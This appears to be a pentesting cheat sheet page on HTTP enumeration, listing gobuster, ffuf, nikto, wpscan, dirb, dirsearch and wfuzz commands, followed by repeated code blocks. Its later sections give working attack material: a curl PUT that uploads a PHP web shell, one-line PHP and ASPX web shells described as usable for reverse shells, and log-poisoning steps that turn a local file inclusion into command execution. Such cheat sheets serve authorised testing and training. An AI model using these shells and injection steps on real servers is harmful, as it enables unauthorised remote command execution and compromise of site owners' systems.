HTTP Enum

Enumerate directories.

`The main thing to remember here is to always run against multiple wordlists starting with directory-list-2.3-medium.txt`

Gobuster

# URL Search

-- Quick Directory Busting:
gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux
gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux

-- Comprehensive Directory Busting
gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0'

-- Search with File Extension
gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php

==========================================================================================================================================================================================

# DNS Search
gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt

==========================================================================================================================================================================================

# vhost Search
gobuster vhost -u https://anysite.com -w common-vhosts.txt

FFUF

ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"
ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"

Nikto Web Scan

nikto -h 10.10.10.10
nikto -h 10.10.10.10 -p 8080                 # Different port
nikto -h 10.10.10.10 -p 443,80,8080,8081     # Multiple ports
nikto -h 10.10.10.10 -p 80-88                # Port range

Wordpress Scan

wpscan --update
wpscan --url http://10.10.10.10/
wpscan --url http://10.10.10.10/wp/

wpscan -u 10.10.10.10/wp/ --enumerate [p/vp/ap/t/vt/at]

**** User ****
u: enumerate users

**** Plugins Switches ****
p: Popular plugins only
vp: Vulnerable plugins only
ap: All plugins

**** Themes Switches ****
t: Popular themes only
vt: Vulnerable plugins only
at: All themes

Drupal

droopescan scan drupal -u http://10.10.10.10/ -t 32

Joomla

joomscan -u http://10.10.10.10/

Dirb

dirb http://10.10.10.x

******** HOTKEYS *******
n -> Go to the next directory.
q -> Stop scan and save current state.
r -> Remaining scan stats

dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt

-x : use this extension list against the wordlists within big.txt

Dirsearch

git clone https://github.com/maurosoria/dirsearch.git
cd dirsearch
python3 dirsearch.py -u <URL> -e <EXTENSION>

Example
python3 dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
./dirsearch.py -u  http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

-u: URL to scan.
-e: formats to search.
-w: wordlist.

Netcat

nc 10.10.10.10 80
HEAD / HTTP/1.0
GET / HTTP/1.0

cUrl

# Header
curl -i INSERTIPADDRESS

# Everything else
curl -i -L INSERTIPADDRESS

# Title and all links
curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//'

# Just text
curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq

# Upload possible?
curl -v -X OPTIONS http://INSERTIPADDRESS/
curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php

Wfuzz

----Simple Test----
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ
wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php

----URL testing----
wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ

----DNS fuzzing----
wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62

Upload a PHP file

In case you can upload a file try the below. This can be used for reverse shell too.

<?php echo system($_GET["cmd"]);?>

OR

<?php echo shell_exec($_GET["cmd"]);?>

WebDav

davtest -url http://10.10.10.10    <-- Make a test to see file extensions upload.
cadaver http://10.10.10.10/        <-- Connect

ASPx Webshell

<%
Set rs = CreateObject("WScript.Shell")
Set cmd = rs.Exec("cmd /c whoami")
o = cmdStdOut.Readall()
Response.write(o)
%>

Code Execution through HTTP/LFI

nc 10.10.10.10
<?php system($_GET['cmd']); ?>
==========================================================================
After this and on the LFI you have discovered just place the variable cmd:
?cmd=id
&cmd=id 

http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id
http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami

PreviousLDAP Enum NextCheckList

Last updated 3 years ago

Was this helpful?

# URL Search -- Quick Directory Busting: gobuster dir -u 10.10.10.20 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux gobuster dir -u 10.10.10.20 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 80 -a Linux -- Comprehensive Directory Busting gobuster dir -s 200,204,301,302,307,403 -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/big.txt -t 80 -a 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0' -- Search with File Extension gobuster dir -u 10.10.10.10 -w /usr/share/seclists/Discovery/Web_Content/common.txt -t 80 -a Linux -x .sh,.html,.txt,.php ========================================================================================================================================================================================== # DNS Search gobuster dns -d anysite.com -t 50 -w /wordlists/subdomains.txt ========================================================================================================================================================================================== # vhost Search gobuster vhost -u https://anysite.com -w common-vhosts.txt

ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/seclists/Discovery/Web-Content/common.txt -e ".txt,.html,.php,.asp,.aspx,.jsp" ffuf -u http://10.10.10.10:80/FUZZ -t 10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -e ".txt,.html,.php,.asp,.aspx,.jsp"

nikto -h 10.10.10.10 nikto -h 10.10.10.10 -p 8080 # Different port nikto -h 10.10.10.10 -p 443,80,8080,8081 # Multiple ports nikto -h 10.10.10.10 -p 80-88 # Port range

wpscan --update wpscan --url http://10.10.10.10/ wpscan --url http://10.10.10.10/wp/ wpscan -u 10.10.10.10/wp/ --enumerate [p/vp/ap/t/vt/at] **** User **** u: enumerate users **** Plugins Switches **** p: Popular plugins only vp: Vulnerable plugins only ap: All plugins **** Themes Switches **** t: Popular themes only vt: Vulnerable plugins only at: All themes

dirb http://10.10.10.x ******** HOTKEYS ******* n -> Go to the next directory. q -> Stop scan and save current state. r -> Remaining scan stats dirb http://10.10.10.10 /usr/share/wordlists/dirb/big.txt -x /usr/share/wordlists/dirb/extensions_common.txt -x : use this extension list against the wordlists within big.txt

git clone https://github.com/maurosoria/dirsearch.git cd dirsearch python3 dirsearch.py -u <URL> -e <EXTENSION> Example python3 dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt ./dirsearch.py -u http://10.10.10.10/ -e cgi,py,php,txt,html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u: URL to scan. -e: formats to search. -w: wordlist.

# Header curl -i INSERTIPADDRESS # Everything else curl -i -L INSERTIPADDRESS # Title and all links curl INSERTIPADDRESS -s -L | grep "title\|href" | sed -e 's/^[[:space:]]*//' # Just text curl INSERTIPADDRESS -s -L | html2text -width '99' | uniq # Upload possible? curl -v -X OPTIONS http://INSERTIPADDRESS/ curl -v -X PUT -d '<?php system($_GET["cmd"]); ?>' http://INSERTIPADDRESS/test/shell.php

----Simple Test---- wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://testsite.com/FUZZ.php ----URL testing---- wfuzz -z range,0-10 --hl 97 http://testsite.com/listofproducts.php?cat=FUZZ ----DNS fuzzing---- wfuzz -c -f sub-fighter -w subdomains.txt -u "http://maindomain.com" -H "Host: FUZZ.maindomain.com" -t 42 --hl 1 wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1mil-20000.txt -u "http://maindomain.com/" -H "Host: FUZZ.maindomain.com" -t 42 --hh 62

nc 10.10.10.10 <?php system($_GET['cmd']); ?> ========================================================================== After this and on the LFI you have discovered just place the variable cmd: ?cmd=id &cmd=id http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=id http://10.10.10.10/somedir/lfi.php?file=../../../var/log/apache2/access.log&cmd=whoami